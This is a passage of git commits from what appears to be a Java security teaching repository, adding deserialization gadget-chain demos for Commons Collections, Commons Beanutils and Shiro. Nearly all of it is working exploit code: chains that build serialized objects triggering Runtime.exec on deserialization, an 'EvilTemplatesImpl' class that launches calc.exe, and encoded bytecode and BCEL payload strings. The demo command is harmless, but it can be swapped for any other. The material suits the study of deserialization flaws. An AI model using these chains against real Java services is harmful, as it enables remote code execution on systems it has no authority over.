ClassLoader().loadClass("$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmP$cbN$CA$Q$ac$91$c7$$$cb$w$I$e2$fby0$B$P$ee$c5$h$c4$8b$89$f1$b0Q$T$M$9e$87e$82C$86$j$b3$M$q$7e$96$k4$f1$e0$H$f8Q$c6$9e$91$f8H$ecCW$ba$aa$ba$d23$ef$l$afo$AN$b0$X$a0$88$e5$Sj$a8$fbX$J$d0$c0$aa$875$P$eb$M$c5$8eL$a59e$c85$5b$3d$86$fc$99$k$I$86J$ySq9$j$f7Ev$c3$fb$8a$98Z$ac$T$aez$3c$93v$9e$93ys$t$t$Ma$yfRE$XB$v$ddf$f0$3b$89$9a$87$G$5d$3d$cd$Sq$$$ad$3bp$86$e3$R$9f$f1$Q$k$7c$P$h$n6$b1$c5Pv$ca$fe$ad$ce$d4$c0$c3v$88$j$ec$92$ff$t$95$a1j$d7$o$c5$d3at$d5$l$89$c4$fc$a1$ba$P$T$p$c6$f4$I$3d$r$a1$R$3bE$ea$e8$3a$93$a9$e9$9aL$f01$jV$ff$87f$f0$ee$ed$a4R$dak$c6$bf$o$N$d1$c3v$ab$87$D$U$e8$fbl$z$80$d9$c3$a9$97h$8a$I$Za$e1$e8$F$ec$d1$c9$B$f5$a2$ps$uS$P$bf$M$84$8b$84$3e$96$be$97$P$c9m$ab$f4$84$85Z$ee$Zy$h$c0$5c$40$e0$a4$CYmT$c5$FW$3f$B$dc$ab$c0$7f$cc$B$A$A").newInstance(); } } diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java new file mode 100644 index 0000000..c37d5af --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java @@ -0,0 +1,51 @@ +package com.govuln.deserialization; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.TransformedMap; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.annotation.Retention; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationHandler; +import java.util.HashMap; +import java.util.Map; + +class CommonsCollections1 { + public static void main(String[] args) throws Exception { + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + }; + + Transformer transformerChain = new ChainedTransformer(transformers); + Map innerMap = new HashMap(); + innerMap.put("value", "xxxx"); + Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); + + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); + construct.setAccessible(true); + InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(handler); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java new file mode 100644 index 0000000..d7e0070 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java @@ -0,0 +1,51 @@ +package com.govuln.deserialization; + +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InvokerTransformer; +import org.apache.commons.collections4.map.TransformedMap; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.annotation.Retention; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationHandler; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollections1For4 { + public static void main(String[] args) throws Exception { + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + }; + + Transformer transformerChain = new ChainedTransformer(transformers); + Map innerMap = new HashMap(); + innerMap.put("value", "xxxx"); + Map outerMap = TransformedMap.transformedMap(innerMap, null, transformerChain); + + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); + construct.setAccessible(true); + InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(handler); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java new file mode 100644 index 0000000..0b8df6a --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java @@ -0,0 +1,55 @@ +package com.govuln.deserialization; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.util.Comparator; +import java.util.PriorityQueue; + +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InvokerTransformer; +import org.apache.commons.collections4.comparators.TransformingComparator; + +public class CommonsCollections2 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String[] args) throws Exception { + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + }; + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + Comparator comparator = new TransformingComparator(transformerChain); + + final PriorityQueue queue = new PriorityQueue(2, comparator); + queue.add(1); + queue.add(2); + + setFieldValue(transformerChain, "iTransformers", transformers); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(queue); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java new file mode 100644 index 0000000..aecb359 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java @@ -0,0 +1,72 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InstantiateTransformer; +import org.apache.commons.collections4.map.TransformedMap; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.annotation.Retention; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.util.Base64; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollections3For4 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String[] args) throws Exception { + // source: bytecodes/HelloTemplateImpl.java + byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{code}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(TrAXFilter.class), + new InstantiateTransformer( + new Class[] { Templates.class }, + new Object[] { obj }) + }; + + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + Map innerMap = new HashMap(); + innerMap.put("value", "xxxx"); + Map outerMap = TransformedMap.transformedMap(innerMap, null, transformerChain); + + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); + construct.setAccessible(true); + InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); + + setFieldValue(transformerChain, "iTransformers", transformers); + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(handler); + oos.close(); + + // 本地测试触发 + // System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object) ois.readObject(); + } +} From dc6d3a4cc53ded6e112ac49aa0dea0a9ac6208a5 Mon Sep 17 00:00:00 2001 From: phith0n Date: Sun, 28 Mar 2021 03:48:57 +0800 Subject: [PATCH 20/35] add CommonsCollections2TemplatesImpl --- .../deserialization/CommonsCollections2.java | 2 +- .../CommonsCollections2TemplatesImpl.java | 55 +++++++++++++++++++ .../src/main/java/evil/EvilTemplatesImpl.java | 19 +++++++ 3 files changed, 75 insertions(+), 1 deletion(-) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java create mode 100644 general/src/main/java/evil/EvilTemplatesImpl.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java index 0b8df6a..c6dd2e0 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java @@ -37,7 +37,7 @@ public static void main(String[] args) throws Exception { Comparator comparator = new TransformingComparator(transformerChain); - final PriorityQueue queue = new PriorityQueue(2, comparator); + PriorityQueue queue = new PriorityQueue(2, comparator); queue.add(1); queue.add(2); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java new file mode 100644 index 0000000..e3bbe2b --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java @@ -0,0 +1,55 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.comparators.TransformingComparator; +import org.apache.commons.collections4.functors.InvokerTransformer; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.util.Comparator; +import java.util.PriorityQueue; + +public class CommonsCollections2TemplatesImpl { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + protected static byte[] getBytescode() throws Exception { + ClassPool pool = ClassPool.getDefault(); + CtClass clazz = pool.get(evil.EvilTemplatesImpl.class.getName()); + return clazz.toBytecode(); + } + + public static void main(String[] args) throws Exception { + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer transformer = new InvokerTransformer("toString", null, null); + Comparator comparator = new TransformingComparator(transformer); + PriorityQueue queue = new PriorityQueue(2, comparator); + queue.add(obj); + queue.add(obj); + + setFieldValue(transformer, "iMethodName", "newTransformer"); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(queue); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} diff --git a/general/src/main/java/evil/EvilTemplatesImpl.java b/general/src/main/java/evil/EvilTemplatesImpl.java new file mode 100644 index 0000000..d02989e --- /dev/null +++ b/general/src/main/java/evil/EvilTemplatesImpl.java @@ -0,0 +1,19 @@ +package evil; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; + +public class EvilTemplatesImpl extends AbstractTranslet { + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} + + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} + + public EvilTemplatesImpl() throws Exception { + super(); + System.out.println("Hello TemplatesImpl"); + Runtime.getRuntime().exec("calc.exe"); + } +} From 883306d44dbe4f14db5976f25732796d07a78fa2 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 2 Apr 2021 02:55:19 +0800 Subject: [PATCH 21/35] add CommonsBeanutils1 --- general/pom.xml | 5 ++ .../src/main/java/com/govuln/beans/Cat.java | 20 +++++++ .../deserialization/CommonsBeanutils1.java | 53 +++++++++++++++++++ 3 files changed, 78 insertions(+) create mode 100644 general/src/main/java/com/govuln/beans/Cat.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java diff --git a/general/pom.xml b/general/pom.xml index afac8b0..8ad9f54 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -31,6 +31,11 @@ commons-collections4 4.0 + + commons-beanutils + commons-beanutils + 1.9.4 + javassist diff --git a/general/src/main/java/com/govuln/beans/Cat.java b/general/src/main/java/com/govuln/beans/Cat.java new file mode 100644 index 0000000..157372e --- /dev/null +++ b/general/src/main/java/com/govuln/beans/Cat.java @@ -0,0 +1,20 @@ +package com.govuln.beans; + +import org.apache.commons.beanutils.PropertyUtils; + +final public class Cat { + private String name = "catalina"; + + public String getName() { + return name; + } + + public void setName(String name) { + this.name = name; + } + + public static void main(String []args) throws Exception { + Cat cat = new Cat(); + System.out.println(PropertyUtils.getProperty(cat, "name")); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java new file mode 100644 index 0000000..1901132 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java @@ -0,0 +1,53 @@ +package com.govuln.deserialization; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.util.PriorityQueue; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; +import org.apache.commons.beanutils.BeanComparator; + +public class CommonsBeanutils1 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + protected static byte[] getBytescode() throws Exception { + ClassPool pool = ClassPool.getDefault(); + CtClass clazz = pool.get(evil.EvilTemplatesImpl.class.getName()); + return clazz.toBytecode(); + } + + public static void main(String[] args) throws Exception { + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + final BeanComparator comparator = new BeanComparator(); + final PriorityQueue queue = new PriorityQueue(2, comparator); + // stub data for replacement later + queue.add(1); + queue.add(1); + + setFieldValue(comparator, "property", "outputProperties"); + setFieldValue(queue, "queue", new Object[]{obj, obj}); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(queue); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} From 89b089ab6f0ae23d7a051654e68038d618ce5ff5 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 2 Apr 2021 02:57:03 +0800 Subject: [PATCH 22/35] upgrade manual --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 68b7e40..a4a3704 100644 --- a/README.md +++ b/README.md @@ -39,6 +39,7 @@ - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) Shiro反序列化: From 16100a4514fc7cd0da77076d2232c2d120c59eaf Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 2 Apr 2021 23:44:50 +0800 Subject: [PATCH 23/35] add 16 chapter --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index a4a3704..4550056 100644 --- a/README.md +++ b/README.md @@ -19,7 +19,8 @@ - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) - [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) -- [ Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) +- [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) +- [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) ## Demo代码 From 49cb1bbfd48d2f2bcba53cacc70dfde2c8b0c21d Mon Sep 17 00:00:00 2001 From: phith0n Date: Sat, 3 Apr 2021 05:42:10 +0800 Subject: [PATCH 24/35] improve --- .../deserialization/CommonsBeanutils1.java | 11 ++--- .../deserialization/CommonsCollections3.java | 8 ++-- .../CommonsCollections3For4.java | 9 ++-- .../java/com/govuln/shiroattack/Client1.java | 20 +++++++++ .../shiroattack/CommonsBeanutils1Shiro.java | 43 +++++++++++++++++++ 5 files changed, 76 insertions(+), 15 deletions(-) create mode 100644 shiroattack/src/main/java/com/govuln/shiroattack/Client1.java create mode 100644 shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java index 1901132..5c51107 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java @@ -10,7 +10,6 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import javassist.ClassPool; -import javassist.CtClass; import org.apache.commons.beanutils.BeanComparator; public class CommonsBeanutils1 { @@ -20,15 +19,11 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr field.set(obj, value); } - protected static byte[] getBytescode() throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(evil.EvilTemplatesImpl.class.getName()); - return clazz.toBytecode(); - } - public static void main(String[] args) throws Exception { TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()}); + setFieldValue(obj, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java index b3f1918..521ce73 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java @@ -3,6 +3,8 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; @@ -30,10 +32,10 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr } public static void main(String[] args) throws Exception { - // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{code}); + setFieldValue(obj, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java index aecb359..487e451 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java @@ -3,6 +3,8 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; @@ -18,7 +20,6 @@ import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -30,10 +31,10 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr } public static void main(String[] args) throws Exception { - // source: bytecodes/HelloTemplateImpl.java - byte[] code = 